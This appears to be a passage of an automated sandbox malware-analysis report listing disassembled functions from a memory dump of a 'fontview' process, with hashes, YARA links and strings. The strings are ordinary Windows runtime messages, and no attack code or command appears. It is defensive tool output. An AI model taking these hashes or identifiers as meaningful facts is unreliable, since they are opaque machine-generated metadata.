                                                                                                                              • Instruction Fuzzy Hash: CD816070E062499EDF24CFA8C8517EEBBB9AF45310F184659D8D1A7A92D634B88087F1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04B220E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                                              • API String ID: 48624451-2819853543
                                                                                                                              • Opcode ID: 504312d901b1c6cbae9a3158b9451a5b6ae56db8805bf8bd7f512b9c2b04cd4b
                                                                                                                              • Instruction ID: 0bc4c61bb651cd1b03b7ab0155f1ec6e1efb9736ca8a6d5abdb36516e3bc4588
                                                                                                                              • Opcode Fuzzy Hash: 504312d901b1c6cbae9a3158b9451a5b6ae56db8805bf8bd7f512b9c2b04cd4b
                                                                                                                              • Instruction Fuzzy Hash: 2D215376A00129ABDB14DEA9CE40EEE77F8EF44645F040196E949E3201E730A9118BA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04A9F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • RTL: Re-Waiting, xrefs: 04AE031E
                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04AE02E7
                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04AE02BD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                              • API String ID: 0-2474120054
                                                                                                                              • Opcode ID: 0cc9baa2b926bfa092fa476f2918ce31aaf1c3a22305279e865b6cfe3fa73341
                                                                                                                              • Instruction ID: b1ec17e077f952e2078d1ed130e0cb3912f0f5e352d629bdb4dcf2a08b4d0efe
                                                                                                                              • Opcode Fuzzy Hash: 0cc9baa2b926bfa092fa476f2918ce31aaf1c3a22305279e865b6cfe3fa73341
                                                                                                                              • Instruction Fuzzy Hash: C5E1BE706087419FDB25CF28C984B6AB7E0BB88318F144A6DF5A5CB2E1E775F845CB42
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • RTL: Re-Waiting, xrefs: 04AE7BAC
                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04AE7B7F
                                                                                                                              • RTL: Resource at %p, xrefs: 04AE7B8E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                              • API String ID: 0-871070163
                                                                                                                              • Opcode ID: e6f97d800e339368c7b42151bc6bc63ebc9341570a8629f447a13fe0fbbd6049
                                                                                                                              • Instruction ID: 67c9707724b2e07791e484c6dedbbdf1fe3d0ddb7b4093dcdb7fec33d3b3e173
                                                                                                                              • Opcode Fuzzy Hash: e6f97d800e339368c7b42151bc6bc63ebc9341570a8629f447a13fe0fbbd6049
                                                                                                                              • Instruction Fuzzy Hash: 3341E1353007029FD720DF25D940B6AB7E5EF88710F040A1DFA6A9B680DB31F8158BA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AAB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04AE728C
                                                                                                                              Strings
                                                                                                                              • RTL: Re-Waiting, xrefs: 04AE72C1
                                                                                                                              • RTL: Resource at %p, xrefs: 04AE72A3
                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04AE7294
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                              • Opcode ID: 4aaab1f4460484a243dd249e607d1065b99b0652872ca265cc8e00cfa2740183
                                                                                                                              • Instruction ID: 37b337f810f3ae1ac819f986fdaa2f5e04e75ad11fe4b7170c97c23ec9e179d4
                                                                                                                              • Opcode Fuzzy Hash: 4aaab1f4460484a243dd249e607d1065b99b0652872ca265cc8e00cfa2740183
                                                                                                                              • Instruction Fuzzy Hash: 5241E235700202AFD720DF65CD41B6AB7A5FF84714F100619FA66EB241DB31F8529BE1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04B22300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: %%%u$]:%u
                                                                                                                              • API String ID: 48624451-3050659472
                                                                                                                              • Opcode ID: b0731b7823864883ab0079e1be95b906337a09f92129f445ed3fbbaae14dbe97
                                                                                                                              • Instruction ID: 2f31ec24e71fc4ef428bc262782d0501cc523e77a6c89f8f8ba51958a4f5f5f3
                                                                                                                              • Opcode Fuzzy Hash: b0731b7823864883ab0079e1be95b906337a09f92129f445ed3fbbaae14dbe97
                                                                                                                              • Instruction Fuzzy Hash: B83157726001299FDB64DE29CD40BEF77F8EF44614F4445D5E84DE3140EB30BA459BA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AB7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-
                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                              • Instruction ID: 2a715ce5bd03741c52d014097ca8f7c2e3ad6ac0e9c745894ef6a3467d3e668b
                                                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                              • Instruction Fuzzy Hash: 9A91C774E002159EDB24DF69C8806FEB7BDAF84760F14451AE8D5E72C2E7B4A940C794
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04A79126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $$@
                                                                                                                              • API String ID: 0-1194432280
                                                                                                                              • Opcode ID: b00e8900e2788e7035f16fa0b8cfa23ca6c16bb0243479215b98f1adcce49d5b
                                                                                                                              • Instruction ID: 1d5813c415cf01c1282f88727b70c8e1a97e70c1bf8761ea7788df09cf235ed7
                                                                                                                              • Opcode Fuzzy Hash: b00e8900e2788e7035f16fa0b8cfa23ca6c16bb0243479215b98f1adcce49d5b
                                                                                                                              • Instruction Fuzzy Hash: B1811DB2D01269DBDB31DB54CD44BEAB7B8AB08754F0041DAE91AB7240E7346E84CFA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AFCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 04AFCFBD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallFilterFunc@8
                                                                                                                              • String ID: @$@4rw@4rw
                                                                                                                              • API String ID: 4062629308-2979693914
                                                                                                                              • Opcode ID: a33a953f52e05e20b23783652be734e3208296f83a0cf1f0f4ff94a8bc958f55
                                                                                                                              • Instruction ID: 12dddc5f9cc89642246547dd6d4cb59d3b18840f83b253cfb94a5691b052e323
                                                                                                                              • Opcode Fuzzy Hash: a33a953f52e05e20b23783652be734e3208296f83a0cf1f0f4ff94a8bc958f55
                                                                                                                              • Instruction Fuzzy Hash: 3A416E72900218DFEB219FE9DD40AADBBB8FF44B14F00446AEE06DB251D738A901DB65
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%